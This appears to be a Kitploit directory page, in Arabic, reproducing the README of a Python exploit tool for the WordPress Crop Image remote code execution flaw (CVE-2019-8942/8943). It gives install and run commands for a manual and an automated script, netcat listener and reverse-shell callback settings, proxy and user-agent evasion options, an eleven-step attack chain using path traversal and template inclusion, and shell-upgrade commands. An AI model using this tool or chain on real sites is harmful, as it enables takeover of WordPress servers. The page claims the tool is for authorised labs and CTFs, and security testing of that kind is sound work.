Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WordPress-RCE-CVE-2019-8942 — أداة استغلال بلغة بايثون لـ WordPress Crop Image RCE — CVE-2019-8942 & CVE-2019-8943 | Kitploit
أدوات/GitHubGitHub/speatx/wordpress-rce-cve-2019-8942
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولاتمختبرات وتدريب عملي
GitHubspeatx/wordpress-rce-cve-2019-8942

WordPress-RCE-CVE-2019-8942

أداة استغلال بلغة بايثون لـ WordPress Crop Image RCE — CVE-2019-8942 & CVE-2019-8943

عرض المستودع
14منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تنفيذ الأوامر عن بعد عبر اقتصاص الصور في ووردبريس — CVE-2019-8942 / CVE-2019-8943

تنفيذ بلغة Python3 لسلسلة استغلال ثغرة اقتصاص الصور في ووردبريس بعد المصادقة. المستودع منظم حول سيري عمل مستقلين: سكربت يدوي على نمط OSCP وسكربت آلي بالكامل مع معالج شل عكسي مدمج.

استخدم هذا فقط في المختبرات المصرح بها، مسابقات CTF، منصات التدريب، أو الأنظمة التي لديك إذن صريح لاختبارها.


إصدارات ووردبريس المتأثرة

سلسلة الاستغلال تستهدف الثغرات المسجلة باسم:

  • CVE-2019-8942
  • CVE-2019-8943

وحدة Metasploit العامة لهذه الثغرة تصف الإصدارات المتأثرة على النحو التالي:

root@kitploit:~
WordPress 5.0.0 and WordPress <= 4.9.8

مطلوب حساب ووردبريس صالح مع صلاحيات رفع/تحرير الوسائط. في العديد من بيئات المختبرات، مستخدم بمستوى Author كافٍ.


هيكل المستودع

root@kitploit:~
.
├── autoexploit.py
├── exploit_oscp.py
├── image.jpg
├── README.md
└── requirements.txt

image.jpg هو الحامل الافتراضي لـJPG المستخدم في سكربت نمط OSCP. تم تضمينه ليعمل سير العمل اليدوي فورًا دون الحاجة للبحث عن صورة عشوائية.

autoexploit.py مستقل بذاته ويتضمن حامل JPG سداسي عشري داخليًا، ولكنه يمكنه أيضًا قبول JPG مخصص باستخدام -i.


التثبيت

root@kitploit:~
python3 -m pip install -r requirements.txt

حزمة Python الوحيدة المطلوبة هي:

root@kitploit:~
requests

إذا كنت تريد دعم وكيل SOCKS، قم بتثبيت requests مع إضافات SOCKS في بيئتك:

root@kitploit:~
python3 -m pip install 'requests[socks]'

اختيار السكربت

السكربتالأنسب لـالتعامل مع الصورةالتعامل مع الشل
exploit_oscp.pyاستغلال يدوي/على نمط OSCPيستخدم image.jpg افتراضيًا، أو -i custom.jpgتبدأ nc يدويًا
autoexploit.pyاستخدام سريع في المختبر واختبارات متكررةيستخدم JPG سداسي عشري مضمن افتراضيًا، أو -i custom.jpgيبدأ المستمع، يطلق ردود الاتصال، ويفتح وحدة تحكم تفاعلية

كلا السكربتين مستقلتان. لا تستورد أي منهما كودًا من الأخرى.


سير عمل نمط OSCP

exploit_oscp.py يحافظ على وضوح سير العمل. يقوم بتحضير حامل الصورة، وينفذ سلسلة استغلال ووردبريس بعد المصادقة، ويؤكد تنفيذ الأمر، ويطلق شل عكسي إلى المستمع الذي بدأته يدويًا.

لا يبدأ معالجًا تلقائيًا ولا يستخدم Metasploit أو Meterpreter أو msfvenom.

الاستخدام الأساسي لنمط OSCP

ابدأ المستمع أولاً:

root@kitploit:~
nc -lvnp 443

قم بتشغيل الاستغلال باستخدام image.jpg الافتراضي:

root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

استخدام OSCP مع JPG مخصص

root@kitploit:~
nc -lvnp 443
root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./custom.jpg --lhost 10.10.14.8 --lport 443

خيارات OSCP

الخيارمطلوبالافتراضيالمعنى
-t, --targetنعملا شيءعنوان URL الأساسي لووردبريس المستهدف، مثلاً http://target.local/
-u, --usernameنعملا شيءاسم مستخدم ووردبريس
-p, --passwordنعملا شيءكلمة مرور ووردبريس
-i, --imageلاimage.jpgحامل JPG لتحضيره ورفعه
--lhostنعملا شيءعنوان IP لرد الاتصال الخاص بك، عادة عنوان VPN/tun0 الخاص بك
--lportنعملا شيءالمنفذ الذي ينتظر عليه المستمع اليدوي الخاص بك
--proxyلالا شيءعنوان URL للوكيل، مثلاً http://127.0.0.1:8080 أو socks5://127.0.0.1:9050
--user-agentلامضمنرأس User-Agent مخصص
--random-user-agentلامعطلاستخدام User-Agent عشوائي يشبه المتصفح
--timeoutلا20مهلة HTTP بالثواني
--debugلامعطلطباعة مخرجات تصحيح HTTP وحفظ الردود الفاشلة المفيدة

مثال OSCP مع Burp

root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./image.jpg --lhost 10.10.14.8 --lport 443 --proxy http://127.0.0.1:8080

سير العمل الآلي بالكامل

autoexploit.py مصمم للسرعة. يمكن تشغيله ببيانات اعتماد الهدف فقط وسيحاول تحديد عنوان IP لرد الاتصال ومنفذ المستمع تلقائيًا.

ينفذ تدفق الاستغلال الكامل، ويبدأ مستمعًا محليًا، ويجرب عدة أنماط من حمولات الشل العكسي، ويفتح وحدة تحكم تفاعلية أنظف مع رسائل حالة محلية ملونة ومعالجة هادئة لترقية TTY.

الاستخدام الآلي الأساسي

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password

الاستخدام الآلي مع قيم رد اتصال صريحة

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

الاستخدام الآلي مع صورة مخصصة ووكيل

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password -i ./image.jpg --proxy http://127.0.0.1:8080

الخيارات الآلية

الخيارمطلوبالافتراضيالمعنى
-t, --targetنعملا شيءعنوان URL الأساسي لووردبريس المستهدف
-u, --usernameنعملا شيءاسم مستخدم ووردبريس
-p, --passwordنعملا شيءكلمة مرور ووردبريس
-i, --imageلاJPG سداسي عشري مضمنحامل JPG مخصص اختياري
--lhostلاكشف تلقائيعنوان IP لرد الاتصال المستخدم من قبل الشل العكسي
--lportلامنفذ محلي حرمنفذ المستمع المحلي
--listen-timeoutلا12ثواني الانتظار لكل محاولة شل عكسي
--proxyلالا شيءعنوان URL للوكيل، مثلاً http://127.0.0.1:8080 أو socks5://127.0.0.1:9050
--user-agentلامضمنرأس User-Agent مخصص
--random-user-agentلامعطلاستخدام User-Agent عشوائي يشبه المتصفح
--timeoutلا20مهلة HTTP بالثواني
--debugلامعطلطباعة مخرجات تصحيح HTTP وحفظ الردود الفاشلة المفيدة

أمثلة الوكيل وUser-Agent

وكيل HTTP عبر Burp:

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password --proxy http://127.0.0.1:8080

وكيل SOCKS:

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password --proxy socks5://127.0.0.1:9050

User-Agent مخصص:

root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443 --user-agent "Mozilla/5.0 Custom"

User-Agent عشوائي:

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password --random-user-agent

لماذا الصورة مهمة

هذا ليس رفع PHP عاديًا. ووردبريس يتوقع محتوى صورة، ويعالج الملف عبر محرر الوسائط، وينشئ صورة مقتصة. ثم تستغل سلسلة الاستغلال البيانات الوصفية للمرفقات وتجاوز المسار لوضع صورة مقتصة داخل مجلد القالب النشط. أخيرًا، يتم الإشارة إلى الملف المقتص كقالب صفحة ليقوم ووردبريس بتضمينه كـ PHP.

JPG عشوائي مع PHP موضوعة في بيانات EXIF الهشة قد يفشل لأن GD يمكنه إزالة أو إعادة ترميز البيانات الوصفية أثناء معالجة الاقتصاص. هذا المستودع يحافظ على وضوح سير العمل:

  • exploit_oscp.py يستخدم image.jpg المضمن افتراضيًا أو صورة مخصصة مرسلة مع -i.
  • autoexploit.py يحتوي على حامل سداسي عشري داخلي ليبقى مستقلاً بذاته.
  • كلا سيري العمل يحضران الرفع بطريقة تهدف إلى النجاة من خطوة الاقتصاص في ووردبريس.

التدفق التقني

  1. المصادقة على ووردبريس.
  2. كشف القالب النشط.
  3. رفع حامل JPG عبر async-upload.php.
  4. الحصول على nonces الوسائط ومحرر الصور والمرفقات.
  5. استخدام التلاعب بـ _wp_attached_file للتأثير على مسار مخرجات الاقتصاص.
  6. تفعيل عملية الاقتصاص مرة واحدة لتهيئة السلوك.
  7. تفعيل عملية الاقتصاص مرة أخرى مع تجاوز المسار إلى مجلد القالب النشط.
  8. إنشاء منشور وتعيين _wp_page_template إلى اسم JPG المقتص.
  9. طلب المنشور ليقوم ووردبريس بتضمين JPG المعد كقالب.
  10. تأكيد تنفيذ الأمر عبر معامل GET 0.
  11. تشغيل شل عكسي إلى نقطة رد الاتصال المكونة أو المختارة تلقائيًا.

استكشاف الأخطاء وإصلاحها

المصادقة تعمل ولكن لم يتم تأكيد التنفيذ

تحقق من أن إصدار ووردبريس ضعيف وأن الحساب يمكنه رفع وتحرير الوسائط.

root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443 --debug

تم تأكيد تنفيذ الأمر ولكن لا يعود شل

تحقق من عنوان IP لرد الاتصال والمستمع.

root@kitploit:~
ip addr show tun0
root@kitploit:~
nc -lvnp 443

ثم قم بتشغيل سكربت OSCP مرة أخرى مع --lhost الصحيح.

Burp لا يظهر حركة المرور

استخدم خيار الوكيل صراحةً:

root@kitploit:~
python3 autoexploit.py -t http://target.local/ -u username -p password --proxy http://127.0.0.1:8080

فشل وكيل SOCKS

قم بتثبيت دعم SOCKS:

root@kitploit:~
python3 -m pip install 'requests[socks]'

الشل غير مستقر

الشل العكسي الأساسي محدود غالبًا. السكربت الآلي يحاول ترقية الجلسة تلقائيًا. في وضع OSCP، قم بالترقية يدويًا بعد تلقي رد الاتصال:

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

اضغط Ctrl+Z محليًا، ثم قم بتشغيل:

root@kitploit:~
stty raw -echo; fg

داخل الشل:

root@kitploit:~
export TERM=xterm

ملاحظات نمط OSCP

exploit_oscp.py يدوي عن قصد:

  • لا Metasploit;
  • لا Meterpreter;
  • لا معالج تلقائي;
  • لا اعتماد على autoexploit.py;
  • مستمع صريح يتحكم به المشغل;
  • LHOST و LPORT صريحان;
  • مخرجات واضحة تظهر كل مرحلة.

سير العمل المقصود هو:

root@kitploit:~
nc -lvnp 443
root@kitploit:~
python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

الإسناد

البحث وسلسلة الثغرات تم توثيقهما علنًا من قبل الباحثين الأصليين وتم تنفيذهما لاحقًا في أطر استغلال عامة.

تنفيذ Python وسير عمل المختبر بواسطة SpeatX.


إشعار قانوني

هذا المستودع مقدم لاختبار الأمان المصرح به، مسابقات CTF، مختبرات التدريب، والبحث التعليمي.

لا تقم بتشغيله ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

تنزيل الأداة